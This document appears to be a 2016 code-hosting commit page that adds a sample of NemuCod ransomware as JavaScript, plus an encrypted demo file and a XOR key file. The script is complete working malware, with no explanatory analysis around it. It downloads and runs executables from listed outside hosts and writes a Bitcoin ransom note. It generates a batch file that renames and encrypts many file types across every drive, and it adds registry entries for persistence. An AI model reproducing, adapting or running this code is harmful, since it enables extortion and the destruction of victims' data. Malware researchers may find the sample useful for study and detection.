karmiphuc · March 26, 2016 20:44 · Mar 24, 2016 · Mar 24, 2016 · Mar 24, 2016 · Mar 24, 2016
diff --git a/company_logo_34090.JPEG.crypted b/company_logo_34090.JPEG.crypted
diff --git a/NemuCod_Ransomware.js b/NemuCod_Ransomware.js
@@ -0,0 +1,143 @@
+var id = "Y5pjzaa6RhR1MczjiSEAbyyWBA8HrE87QcsBpRsmsZqTIV6XNLZvp_WH_IEJw6VNcQsvYCYobXPT6dngUaPwkgn1qxOz8iU";
+var ad = "1ErUiHS9tMxWdqeJaaD2bEfJ3V4zCqQc76";
+var bc = "0.40943";
+var ld = 0;
+var cq = String.fromCharCode(34);
+var cs = String.fromCharCode(92);
+var ll = "angelucci.info globalautomotive.it catteau.francois.perso.neuf.fr 46.249.204.170 kandiramyo.kocaeli.edu.tr".split(" ");
+var ws = WScript.CreateObject("WScript.Shell");
+var fn = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "981027";
+var xo = WScript.CreateObject("MSXML2.XMLHTTP");
+var xa = WScript.CreateObject("ADODB.Stream");
+var fo = WScript.CreateObject("Scripting.FileSystemObject");
+if (!fo.FileExists(fn + ".txt"))
+{
+    for (var i = ld; i < ll.length; i++)
+    {
+        var dn = 0;
+        try
+        {
+            xo.open("GET", "http://" + ll[i] + "/counter/?ad=" + ad + "&dc=480392", false);
+            xo.send();
+            if (xo.status == 200)
+            {
+                xa.open();
+                xa.type = 1;
+                xa.write(xo.responseBody);
+                if (xa.size > 1000)
+                {
+                    dn = 1;
+                    xa.position = 0;
+                    xa.saveToFile(fn + ".exe", 2);
+                };
+                xa.close();
+            };
+            if (dn == 1)
+            {
+                ld = i;
+                break;
+            };
+        }
+        catch (er)
+        {
+        };
+    };
+
+    if (fo.FileExists(fn + ".exe"))
+    {
+        fp = fo.CreateTextFile(fn + ".txt", true);
+        fp.WriteLine("ATTENTION!");
+        fp.WriteLine("");
+        fp.WriteLine("All your documents, photos, databases and other important personal files");
+        fp.WriteLine("were encrypted using strong RSA-1024 algorithm with a unique key.");
+        fp.WriteLine("To restore your files you have to pay " + bc + " BTC (bitcoins).");
+        fp.WriteLine("Please follow this manual:");
+        fp.WriteLine("");
+        fp.WriteLine("1. Create Bitcoin wallet here:");
+        fp.WriteLine("");
+        fp.WriteLine("      https://blockchain.info/wallet/new");
+        fp.WriteLine("");
+        fp.WriteLine("2. Buy " + bc + " BTC with cash, using search here:");
+        fp.WriteLine("");
+        fp.WriteLine("      https://localbitcoins.com/buy_bitcoins");
+        fp.WriteLine("");
+        fp.WriteLine("3. Send " + bc + " BTC to this Bitcoin address:");
+        fp.WriteLine("");
+        fp.WriteLine("      " + ad);
+        fp.WriteLine("");
+        fp.WriteLine("4. Open one of the following links in your browser to download decryptor:");
+        fp.WriteLine("");
+        for (var i = 0; i < ll.length; i++)
+        {
+            fp.WriteLine("      http://" + ll[i] + "/counter/?ad=" + ad);
+        };
+        fp.WriteLine("");
+        fp.WriteLine("5. Run decryptor to restore your files.");
+        fp.WriteLine("");
+        fp.WriteLine("PLEASE REMEMBER:");
+        fp.WriteLine("");
+        fp.WriteLine("      - If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.");
+        fp.WriteLine("      - Nobody can help you except us.");
+        fp.WriteLine("      - It`s useless to reinstall Windows, update antivirus software, etc.");
+        fp.WriteLine("      - Your files can be decrypted only after you make payment.");
+        fp.WriteLine("      - You can find this manual on your desktop (DECRYPT.txt).");
+        fp.Close();
+
+        fp = fo.CreateTextFile(fn + ".cmd", true);
+        for (var i = 67; i <= 90; i++)
+        {
+            fp.WriteLine("dir /B " + cq + String.fromCharCode(i) + ":" + cs + cq + " && for /r " + cq + String.fromCharCode(i) + ":" + cs + cq + " %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN " + cq + "%%i" + cq + " " + cq + "%%~nxi.crypted" + cq + " & call " + fn + ".exe " + cq + "%%i.crypted" + cq + ")");
+        };
+        fp.WriteLine("REG ADD " + cq + "HKCU" + cs + "SOFTWARE" + cs + "Microsoft" + cs + "Windows" + cs + "CurrentVersion" + cs + "Run" + cq + " /V " + cq + "Crypted" + cq + " /t REG_SZ /F /D " + cq + fn + ".txt" + cq);
+        fp.WriteLine("REG ADD " + cq + "HKCR" + cs + ".crypted" + cq + " /ve /t REG_SZ /F /D " + cq + "Crypted" + cq);
+        fp.WriteLine("REG ADD " + cq + "HKCR" + cs + "Crypted" + cs + "shell" + cs + "open" + cs + "command" + cq + " /ve /t REG_SZ /F /D " + cq + "notepad.exe " + cs + cq + fn + ".txt" + cs + cq + cq);
+        fp.WriteLine("copy /y " + cq + fn + ".txt" + cq + " " + cq + "%AppData%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq);
+        fp.WriteLine("copy /y " + cq + fn + ".txt" + cq + " " + cq + "%UserProfile%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq);
+        fp.WriteLine("copy /y " + cq + fn + ".txt" + cq + " " + cq + fn + ".exe" + cq);
+        fp.WriteLine("del " + cq + fn + ".exe" + cq);
+        fp.WriteLine("del " + cq + fn + ".cmd" + cq + " & notepad.exe " + cq + fn + ".txt" + cq);
+        fp.Close();
+        ws.Run(fn + ".cmd", 0, 0);
+    };
+
+    for (var n = 1; n <= 2; n++)
+    {
+        for (var i = ld; i < ll.length; i++)
+        {
+            var dn = 0;
+            try
+            {
+                xo.open("GET", "http://" + ll[i] + "/counter/?id=" + id + "&rnd=74984" + n, false);
+                xo.send();
+                if (xo.status == 200)
+                {
+                    xa.open();
+                    xa.type = 1;
+                    xa.write(xo.responseBody);
+                    if (xa.size > 1000)
+                    {
+                        dn = 1;
+                        xa.position = 0;
+                        xa.saveToFile(fn + n + ".exe", 2);
+                        try
+                        {
+                            ws.Run(fn + n + ".exe", 1, 0);
+                        }
+                        catch (er)
+                        {
+                        };
+                    };
+                    xa.close();
+                };
+                if (dn == 1)
+                {
+                    ld = i;
+                    break;
+                };
+            }
+            catch (er)
+            {
+            };
+        };
+    };
+};
diff --git a/XOR_Encryption_key_255byte b/XOR_Encryption_key_255byte
@@ -0,0 +1 @@
+key = YTQ1MzVjYTNmZDBhNDUwNWU0MDczZjAxODM3YWE1MGFBSkl5Wm14a1ptTDBNeld4TDJWM013RDBBR1IxWndIM013U3lMSlZqWjJNblp4RWZHVXFTcngxRUh6Y25vSXE2REhxMXFJY2dFVGtPcTNPZUp6MUtxMGszclFFUEhIRGtEeVNHSnljNEVUMVVJUVNGREh0a0lIRVlySjVscklNZ0ZhYmtaS1dHTDJxVEYzeUNwR0ExTXhjNUgwV25yVGZ
Original file line number	Diff line number	Diff line change
		@@ -0,0 +1 @@
		key = YTQ1MzVjYTNmZDBhNDUwNWU0MDczZjAxODM3YWE1MGFBSkl5Wm14a1ptTDBNeld4TDJWM013RDBBR1IxWndIM013U3lMSlZqWjJNblp4RWZHVXFTcngxRUh6Y25vSXE2REhxMXFJY2dFVGtPcTNPZUp6MUtxMGszclFFUEhIRGtEeVNHSnljNEVUMVVJUVNGREh0a0lIRVlySjVscklNZ0ZhYmtaS1dHTDJxVEYzeUNwR0ExTXhjNUgwV25yVGZ